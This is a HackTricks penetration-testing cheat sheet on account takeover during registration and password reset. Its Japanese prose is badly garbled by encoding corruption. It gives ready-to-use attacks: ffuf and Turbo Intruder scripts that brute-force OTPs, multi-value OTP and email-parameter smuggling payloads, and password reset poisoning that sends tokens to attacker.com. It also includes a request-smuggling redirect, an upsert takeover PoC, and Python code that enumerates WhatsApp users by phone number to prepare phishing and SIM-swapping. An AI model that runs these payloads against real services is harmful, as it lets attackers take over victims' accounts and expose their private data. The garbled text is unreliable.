ç»é²ãšä¹ã£åãã®è匱æ§
Tip
AWSãããã³ã°ãåŠã³ãå®è·µããïŒ
HackTricks Training AWS Red Team Expert (ARTE)
GCPãããã³ã°ãåŠã³ãå®è·µããïŒHackTricks Training GCP Red Team Expert (GRTE)
Azureãããã³ã°ãåŠã³ãå®è·µããïŒ
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksããµããŒããã
- ãµãã¹ã¯ãªãã·ã§ã³ãã©ã³ã確èªããŠãã ããïŒ
- **ð¬ Discordã°ã«ãŒããŸãã¯ãã¬ã°ã©ã ã°ã«ãŒãã«åå ããããTwitter ðŠ @hacktricks_liveããã©ããŒããŠãã ããã
- HackTricksããã³HackTricks Cloudã®GitHubãªããžããªã«PRãæåºããŠãããã³ã°ããªãã¯ãå ±æããŠãã ããã
ç»é²ã®ä¹ã£åã
Duplicate Registration
- æ¢åã® username ã䜿ã£ãŠçæã詊ã
- email ãå€åãããŠç¢ºèªãã:
- uppercase
- +1@
- email ã«ãããã远å
- email åã«ç¹æ®æåãå ¥ãã (%00, %09, %20)
- email ã®åŸã«ç©ºçœæåãå
¥ãã:
test@test.com a - victim@gmail.com@attacker.com
- victim@attacker.com@gmail.com
- ã¡ãŒã«ãããã€ãã®æ£èŠåããªãã¯ã詊ãïŒãµãŒãã¹äŸåïŒ:
- Gmail ã¯ããããšãµãã¢ãã¬ãã·ã³ã°ãç¡èŠãã:
victim+1@gmail.com,v.ic.tim@gmail.comã¯victim@gmail.comã«é ä¿¡ããã - äžéšãããã€ã㯠local-part ã倧æåå°æåãåºå¥ããªã
- äžéšãããã€ã㯠unicode ã® confusables ãåãä»ãããhomoglyphs ã soft hyphen
\u00ADã local-part å ã§è©Šã - ããããæªçšããŠããŠããŒã¯ãã¹ãã§ãã¯ãåé¿ããããéè€ã¢ã«ãŠã³ã/workspace æåŸ ãååŸããããä¹ã£åãæºåäžã«è¢«å®³è ã®ãµã€ã³ã¢ããããããã¯ïŒäžæç㪠DoSïŒãã
Username Enumeration
ã¢ããªå ã§æ¢ã«ç»é²ãããŠãã username ãèŠã€ããããã確èªããã
- ç°ãªããšã©ãŒã¡ãã»ãŒãžã HTTP ã¹ããŒã¿ã¹ã³ãŒã
- ã¿ã€ãã³ã°å·®ïŒæ¢åãŠãŒã¶ã¯ IdP/DB ãžã®ã«ãã¯ã¢ãããããªã¬ãŒããå ŽåãããïŒ
- æ¢ç¥ã® emails ã«å¯Ÿããç»é²ãã©ãŒã ã®ãããã¡ã€ã«ããŒã¿èªåå ¥å
- team/invite ãããŒã確èªïŒemail ãå ¥åãããšã¢ã«ãŠã³ãã®æç¡ãæããã«ãªãå Žåããã
Password Policy
ãŠãŒã¶äœææã« password policy ã確èªããïŒåŒ±ããã¹ã¯ãŒãã䜿ãããã確èªïŒã
ãã®å Žå㯠credentials ã bruteforce ããããšã詊ã¿ããããããªãã
SQL Injection
Check this page ãåç §ããŠãç»é²ãã©ãŒã ã§ã® SQL Injections ã䜿ã£ãã¢ã«ãŠã³ãä¹ã£åãã®è©Šè¡ãæ å ±æœåºæ¹æ³ãåŠã¶ã
Oauth Takeovers
SAML Vulnerabilities
Change Email
ç»é²åŸã« email ã倿ŽããŠããã®å€æŽãæ£ããæ€èšŒãããããä»»æã® email ã«å€æŽã§ããŠããŸããã確èªããã
More Checks
- disposable emailsïŒmailinator, yopmail, 1secmail ãªã©ïŒã䜿ãããããŸãã¯
victim+mailinator@gmail.comã®ãããªãµãã¢ãã¬ãã·ã³ã°ã§ãããã¯ãªã¹ããåé¿ã§ããã確èªãã - é·ã password (>200) 㯠DoS ãåŒãèµ·ããå¯èœæ§ããã
- ã¢ã«ãŠã³ãäœææã®ã¬ãŒãå¶éã確èªãã
- username@burp_collab.net ã䜿ããcallback ãè§£æãã
- é»è©±çªå·æ€èšŒã䜿ãããŠããå Žåãphone parsing/injection ã®ãšããžã±ãŒã¹ã確èªãã
Contact-discovery / identifier-enumeration oracles
Phone-numberâcentric messengers ã¯ã¯ã©ã€ã¢ã³ããé£çµ¡å ãåæãããã³ã« presence oracle ãé²åãããWhatsApp ã® discovery ãªã¯ãšã¹ãããªãã¬ã€ãããšæŽå²çã« >100M lookups per hour ãéæããã»ãŒå®å šãªã¢ã«ãŠã³ãåæãå¯èœã«ããã
Attack workflow
- å ¬åŒã¯ã©ã€ã¢ã³ãã Instrument ããŠãaddress-book upload requestïŒæ£èŠåããã E.164 çªå·ã®èªèšŒæžã¿ blobïŒããã£ããã£ãããæ»æè çæã®çªå·ã§ãªãã¬ã€ãã€ã€åã cookies/device token ãåå©çšããã
- ãªã¯ãšã¹ãããšã«çªå·ããããåããïŒWhatsApp ã¯æ°åã®èå¥åãåãä»ããregistered/unregistered ã«å ãã¡ã¿ããŒã¿ïŒbusiness, companion ãªã©ïŒãè¿ããã¬ã¹ãã³ã¹ããªãã©ã€ã³ã§è§£æããŠã被害è ã«ã¡ãã»ãŒãžãéããã«ã¿ãŒã²ãããªã¹ããäœæããã
- SIM banksãcloud devicesããŸã㯠residential proxies ã§æšªæ¹åã«ã¹ã±ãŒã«ããŠåæãè¡ããã¢ã«ãŠã³ãåäœ/IP/ASN ã®ã¹ããããªã³ã°ãããªã¬ãŒãããªãããã«ããã
Dialing-plan modeling
ååœã®ãã€ã€ã«ãã©ã³ãã¢ãã«åããŠç¡å¹ãªåè£ãçããNDSS ããŒã¿ã»ããïŒcountry-table.*ïŒã¯åœã³ãŒããæ¡çšå¯åºŠããã©ãããã©ãŒã ååžãäžèЧããŠããã®ã§ãé«ãããç¯å²ãåªå
ã§ãããExample seeding code:
import pandas as pd
from itertools import product
df = pd.read_csv("country-table.csv")
row = df[df["Country"] == "India"].iloc[0]
prefix = "+91" # India mobile numbers are 10 digits
for suffix in product("0123456789", repeat=10):
candidate = prefix + "".join(suffix)
enqueue(candidate)
Prioritise prefixes that match real allocations (Mobile Country Code + National Destination Code) before querying the oracle to keep throughput useful.
Turning enumerations into targeted attacks
- Feed leaked phone numbers (e.g., Facebookâs 2021 breach) into the oracle to learn which identities are still active before phishing, SIM-swapping, or spamming.
- åœ/OS/ã¢ããªçš®å¥ã§ã»ã³ãµã¹ãåå²ããŠãSMSãã£ã«ã¿ãªã³ã°ã匱ãããŸãã¯WhatsApp Businessã®å°å ¥çãé«ãå°åãèŠã€ããå°åç¹åã®social engineeringãè¡ãã
Public-key reuse correlation
WhatsApp exposes each accountâs X25519 identity key during session setup. Request identity material for every enumerated number and deduplicate the public keys to reveal account farms, cloned clients, or insecure firmwareâshared keys deanonymize multi-SIM operations.
Weak Email/Phone Verification (OTP/Magic Link)
Registration flows often verify ownership via a numeric OTP or a magic-link token. Typical flaws:
- Guessable or short OTP (4â6 digits) with no effective rate limiting or IP/device tracking. Try parallel guesses and header/IP rotation.
- OTP reuse across actions or accounts, or not bound to the specific user/action (e.g., same code works for login and signup, or works after email is changed).
- Multi-value smuggling: some backends accept multiple codes and verify if any matches. Try:
code=000000&code=123456- JSON arrays:
{"code":["000000","123456"]} - Mixed parameter names:
otp=000000&one_time_code=123456 - Comma/pipe separated values:
code=000000,123456orcode=000000|123456 - Response oracle: distinguish wrong vs expired vs wrong-user codes by status/message/body length.
- Tokens not invalidated after success or after password/email change.
- Verification token not tied to user agent/IP allowing cross-origin completion from attacker-controlled pages.
Bruteforcing example with ffuf against a JSON OTP endpoint:
ffuf -w <wordlist_of_codes> -u https://target.tld/api/verify -X POST \
-H 'Content-Type: application/json' \
-d '{"email":"victim@example.com","code":"FUZZ"}' \
-fr 'Invalid|Too many attempts' -mc all
䞊å/åæã®æšæž¬ã§é£ç¶ããã¯ã¢ãŠããåé¿ããïŒBurp ã® Turbo Intruder ã䜿çšïŒ:
6âdigit OTP 詊è¡ã倧éã«éä¿¡ãã Turbo Intruder ã¹ãããã
```python def queueRequests(target, wordlists): engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=30, requestsPerConnection=100) for code in range(0,1000000): body = '{"email":"victim@example.com","code":"%06d"}' % code engine.queue(target.req, body=body)def handleResponse(req, interesting): if req.status != 401 and bâInvalidâ not in req.response: table.add(req)
</details>
- Try racing verification: åãæå¹ãªOTPã2ã€ã®ã»ãã·ã§ã³ã§åæã«éä¿¡ããŸããææãäžæ¹ã®ã»ãã·ã§ã³ãæ€èšŒãããæ»æè
ã¢ã«ãŠã³ãã«ãªãã被害è
åŽã®ãããŒãæåããããšããããŸãã
- Also test Host header poisoning on verification links (same as reset poisoning below) to leak or complete verification on attacker controlled host. æ»æè
ãå¶åŸ¡ãããã¹ãäžã§æ€èšŒãleakãŸãã¯å®äºã§ããã確èªãããããverification linksäžã§Host header poisoningããã¹ãããŠãã ããã
<a class="content_ref" href="rate-limit-bypass.md"><span class="content_ref_label">Rate Limit Bypass</span></a>
<a class="content_ref" href="2fa-bypass.md"><span class="content_ref_label">2FA/MFA/OTP Bypass</span></a>
<a class="content_ref" href="email-injections.md"><span class="content_ref_label">Email Injections</span></a>
## Account PreâHijacking Techniques (before the victim signs up)
被害è
ãã¢ã«ãŠã³ããäœæããåã«æ»æè
ã被害è
ã®ã¡ãŒã«ã«å¯ŸããŠæäœãè¡ãããã®åŸã¢ã¯ã»ã¹ãåãæ»ãããšã§çºçãã匷åãªåé¡çŸ€ããããŸãã
Key techniques to test (adapt to the targetâs flows):
- ClassicâFederated Merge
- æ»æè
: 被害è
ã®ã¡ãŒã«ã§classicã¢ã«ãŠã³ããç»é²ãããã¹ã¯ãŒããèšå®ãã
- 被害è
: åŸã§åãã¡ãŒã«ã§SSOã§ãµã€ã³ã¢ãããã
- äžé©åãªããŒãžã¯äž¡è
ããã°ã€ã³ç¶æ
ã®ãŸãŸã«ãªã£ãããæ»æè
ã®ã¢ã¯ã»ã¹ã埩掻ããå¯èœæ§ããã
- Unexpired Session Identifier
- æ»æè
: ã¢ã«ãŠã³ããäœæããŠé·æéæå¹ãªã»ãã·ã§ã³ãç¶æããïŒãã°ã¢ãŠãããªãïŒ
- 被害è
: ã¢ã«ãŠã³ããå埩ïŒãã¹ã¯ãŒããèšå®ãå©çšãéå§ãã
- ãªã»ãããMFAæå¹ååŸãå€ãã»ãã·ã§ã³ãæå¹ãªãŸãŸãããã¹ããã
- Trojan Identifier
- æ»æè
: äºåäœæããã¢ã«ãŠã³ãã«äºæ¬¡èå¥åã远å ããïŒé»è©±ã远å ã¡ãŒã«ããŸãã¯æ»æè
ã®IdPããªã³ã¯ïŒ
- 被害è
: ãã¹ã¯ãŒãããªã»ããããïŒæ»æè
ã¯åŸã§ãã®trojan identifierã䜿ã£ãŠãªã»ããïŒãã°ã€ã³ãã
- Unexpired Email Change
- æ»æè
: emailâchangeãæ»æè
ã®ã¡ãŒã«ãžéå§ãã確èªãä¿çãã
- 被害è
: ã¢ã«ãŠã³ããå埩ããŠäœ¿çšãéå§ãã
- æ»æè
: åŸã§ä¿çäžã®emailâchangeãå®äºããŠã¢ã«ãŠã³ãã奪åãã
- NonâVerifying IdP
- æ»æè
: ã¡ãŒã«æææš©ãæ€èšŒããªãIdPã䜿ã£ãŠ `victim@âŠ` ã䞻匵ãã
- 被害è
: classicã«ãŒãã§ãµã€ã³ã¢ãããã
- ãµãŒãã¹ã `email_verified` ã確èªãããããŒã«ã«æ€èšŒãè¡ããã«ã¡ãŒã«ã§ããŒãžããå Žåããã
Practical tips
- web/mobileã®ãã³ãã«ãããããŒãšãšã³ããã€ã³ããåéããŠãã ãããclassic signupãSSOã®ãªã³ã¯ãemail/phoneã®å€æŽãpassword resetã®ãšã³ããã€ã³ããæ¢ããŸãã
- ä»ã®ãããŒãæ€æ»ããŠããéã«ã»ãã·ã§ã³ãç¶æããããã®çŸå®çãªèªååãäœæããŠãã ããã
- SSOãã¹ãã®ããã«ããã¹ãçšã®OIDC providerãç«ãŠã被害è
ã¢ãã¬ã¹ã® `email` ã¯ã¬ãŒã ãš `email_verified=false` ãå«ãããŒã¯ã³ãçºè¡ããŠãRPãæªæ€èšŒã®IdPãä¿¡é Œãããã©ããã確èªããŠãã ããã
- ãã¹ã¯ãŒããªã»ãããã¡ãŒã«å€æŽã®åŸã¯ã以äžã確èªããŠãã ãã:
- ä»ã®ãã¹ãŠã®ã»ãã·ã§ã³ãšããŒã¯ã³ãç¡å¹åãããŠããããšã
- ä¿çäžã®email/phone倿Žã®æ©èœããã£ã³ã»ã«ãããŠããããšã
- 以åã«ãªã³ã¯ãããŠããIdP/ã¡ãŒã«/é»è©±ãå床æ€èšŒãããŠããããšã
Note: ãããã®ææ³ã®è©³çŽ°ãªææ³è«ãšã±ãŒã¹ã¹ã¿ãã£ã¯ãMicrosoftã®preâhijackingç ç©¶ã«ãã£ãŠææžåãããŠããŸãïŒåèæç®ã¯æ«å°Ÿåç
§ïŒã
<a class="content_ref" href="reset-password.md"><span class="content_ref_label">Reset/Forgotten Password Bypass</span></a>
<a class="content_ref" href="race-condition.md"><span class="content_ref_label">Race Condition</span></a>
## **Password Reset Takeover**
### Password Reset Token Leak Via Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
1. Request password reset to your email address
2. Click on the password reset link
3. Donât change password
4. Click any 3rd party websites(eg: Facebook, twitter)
5. Intercept the request in Burp Suite proxy
6. Check if the referer header is leaking password reset token.
### Password Reset Poisoning <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>
1. Burp Suiteã§password resetã®ãªã¯ãšã¹ããã€ã³ã¿ãŒã»ãããã
2. Burp Suiteã§æ¬¡ã®ãããã远å ãŸãã¯ç·šéãã: `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. 倿Žãããããã§ãªã¯ãšã¹ãã転éãã\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. _host header_ ã«åºã¥ããpassword resetã®URLïŒäŸ: `https://attacker.com/reset-password.php?token=TOKEN`ïŒããªãã確èªãã
### Password Reset Via Email Parameter <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```bash
# parameter pollution
email=victim@mail.com&email=hacker@mail.com
# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}
# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com
# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
IDOR on API Parameters
- æ»æè ã¯èªåã®ã¢ã«ãŠã³ãã§ãã°ã€ã³ãããã¹ã¯ãŒã倿޿©èœã«ç§»åããå¿ èŠããããŸãã
- Burp Suiteãèµ·åããŠãªã¯ãšã¹ããã€ã³ã¿ãŒã»ãããã
- Send it to the repeater tab and edit the parameters : User ID/email
powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})
Weak Password Reset Token
ãã¹ã¯ãŒããªã»ããããŒã¯ã³ã¯ã©ã³ãã ã«çæãããæ¯åãŠããŒã¯ã§ããã¹ãã§ãã
ããŒã¯ã³ãæå¹æéã§åããããåžžã«åããã確èªããŠãã ãããå Žåã«ãã£ãŠã¯çæã¢ã«ãŽãªãºã ãåŒ±ãæšæž¬å¯èœãªããšããããŸããã¢ã«ãŽãªãºã ã«äœ¿çšãããå¯èœæ§ã®ãã倿°ã¯ä»¥äžã®éãã§ãã
- ã¿ã€ã ã¹ã¿ã³ã
- ãŠãŒã¶ãŒID
- ãŠãŒã¶ãŒã®ã¡ãŒã«ã¢ãã¬ã¹
- åãšå§
- çå¹Žææ¥
- æå·å
- æ°åã®ã¿
- å°ããªããŒã¯ã³åïŒæå㯠[A-Z,a-z,0-9] ã®ç¯å²ïŒ
- ããŒã¯ã³ã®åå©çš
- ããŒã¯ã³ã®æå¹æé
Leaking Password Reset Token
- API/UIã䜿ã£ãŠç¹å®ã®ã¡ãŒã«ïŒäŸ: test@mail.comïŒã«å¯ŸããŠãã¹ã¯ãŒããªã»ãããªã¯ãšã¹ããçºè¡ãã
- ãµãŒããŒã®ã¬ã¹ãã³ã¹ã確èªãã
resetTokenããã§ãã¯ãã - ãã®ããŒã¯ã³ã以äžã®ãããªURLã§äœ¿çšãã:
https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]
Password Reset Via Username Collision
- 被害è
ã®ãŠãŒã¶ãŒåãšåäžã ãããŠãŒã¶ãŒåã®ååŸã«ç©ºçœãæ¿å
¥ãããŠãŒã¶ãŒåã§ã·ã¹ãã ã«ç»é²ãããäŸ:
"admin " - æªæã®ãããŠãŒã¶ãŒåã§ãã¹ã¯ãŒããªã»ãããèŠæ±ããã
- èªåã®ã¡ãŒã«ã«éãããŠããããŒã¯ã³ã䜿ã£ãŠè¢«å®³è ã®ãã¹ã¯ãŒãããªã»ããããã
- æ°ãããã¹ã¯ãŒãã§è¢«å®³è ã®ã¢ã«ãŠã³ãã«ãã°ã€ã³ããã
ãã©ãããã©ãŒã CTFd ã¯ãã®æ»æã«å¯ŸããŠè匱ã§ããã
See: CVE-2020-7245
Account Takeover Via Cross Site Scripting
- ã¢ããªã±ãŒã·ã§ã³ãŸãã¯ãµããã¡ã€ã³å
ã§XSSãèŠã€ããïŒã¯ãããŒã芪ãã¡ã€ã³ã«ã¹ã³ãŒããããŠããå Žåã«æå¹ïŒ:
*.domain.com - çŸåšã® sessions cookie ã leak ãã
- ãã®cookieã䜿ã£ãŠãŠãŒã¶ãŒãšããŠèªèšŒãã
Account Takeover Via HTTP Request Smuggling
- HTTP Request Smuggling ã®ã¿ã€ã (CL, TE, CL.TE) ãæ€åºããããã« smuggler ã䜿çšãã
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h\ - 次ã®ããŒã¿ã§
POST / HTTP/1.1ãäžæžããããªã¯ãšã¹ããäœæãã:GET http://something.burpcollaborator.net HTTP/1.1 X:â ç®çã¯è¢«å®³è ã burpcollab ãž open redirect ãããã¯ãããŒãçãããš - Final request could look like the following
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0
GET http://something.burpcollaborator.net HTTP/1.1
X: X
Hackerone ã«ãããã®ãã°ã®æªçšå ±å\
ã¢ã«ãŠã³ãä¹ã£åã via CSRF
- CSRFçšã®ãã€ããŒããäœæãããäŸ: âHTML form with auto submit for a password changeâ
- ãã€ããŒããéä¿¡ãã
ã¢ã«ãŠã³ãä¹ã£åã via JWT
JSON Web Token ããŠãŒã¶èªèšŒã«äœ¿ãããŠããå¯èœæ§ãããã
- JWT ã® User ID / Email ãå¥ã®ãã®ã«æžãæãã
- 匱ã JWT 眲åããªãã確èªãã
JWT Vulnerabilities (Json Web Tokens)
Registration-as-Reset (Upsert on Existing Email)
æäŸããã email ãæ¢ã«ååšããå Žåãäžéšã® signup handlers 㯠upsert ãå®è¡ããããã endpoint ã email ãš password ãå«ãæå°éã® body ãåãå ¥ããæææš©æ€èšŒã匷å¶ããªãå Žåã被害è ã® email ãéä¿¡ãããšèªèšŒåã«ãã¹ã¯ãŒããäžæžããããã
- çºèŠ: ãã³ãã«ããã JSïŒãŸãã¯ã¢ãã€ã«ã¢ããªã®ãã©ãã£ãã¯ïŒãã endpoint åãåéããæ¬¡ã« ffuf/dirsearch ã䜿ã£ãŠ /parents/application/v4/admin/FUZZ ã®ãããªããŒã¹ãã¹ã fuzz ããã
- ææ³ã®ãã³ã: GET ã âOnly POST request is allowed.â ã®ãããªã¡ãã»ãŒãžãè¿ãå Žåãããã¯æ£ãã HTTP verb ã瀺ããŠãããJSON body ãæåŸ ãããŠããããšãå€ãã
- å®éã«ç¢ºèªãããæå°éã® body:
{"email":"victim@example.com","password":"New@12345"}
PoC ã®äŸ:
POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1
Host: www.target.tld
Content-Type: application/json
{"email":"victim@example.com","password":"New@12345"}
圱é¿: Full Account Takeover (ATO) â reset tokenãOTPããŸã㯠email verification ãäžåå¿ èŠãšããªãã
åè
- éèŠãª Password Reset Bug ãèŠã€ããæ¹æ³ (Registration upsert ATO)
- Microsoft MSRC â Preâhijacking attacks on web user accounts (2022幎5æ)
- https://salmonsec.com/cheatsheet/account_takeover
- Hey there! You are using WhatsApp: ã»ãã¥ãªãã£ãšãã©ã€ãã·ãŒã®ããã®30åã¢ã«ãŠã³ãåæ (NDSS 2026 paper & dataset)
Tip
AWSãããã³ã°ãåŠã³ãå®è·µããïŒ
HackTricks Training AWS Red Team Expert (ARTE)
GCPãããã³ã°ãåŠã³ãå®è·µããïŒHackTricks Training GCP Red Team Expert (GRTE)
Azureãããã³ã°ãåŠã³ãå®è·µããïŒ
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksããµããŒããã
- ãµãã¹ã¯ãªãã·ã§ã³ãã©ã³ã確èªããŠãã ããïŒ
- **ð¬ Discordã°ã«ãŒããŸãã¯ãã¬ã°ã©ã ã°ã«ãŒãã«åå ããããTwitter ðŠ @hacktricks_liveããã©ããŒããŠãã ããã
- HackTricksããã³HackTricks Cloudã®GitHubãªããžããªã«PRãæåºããŠãããã³ã°ããªãã¯ãå ±æããŠãã ããã


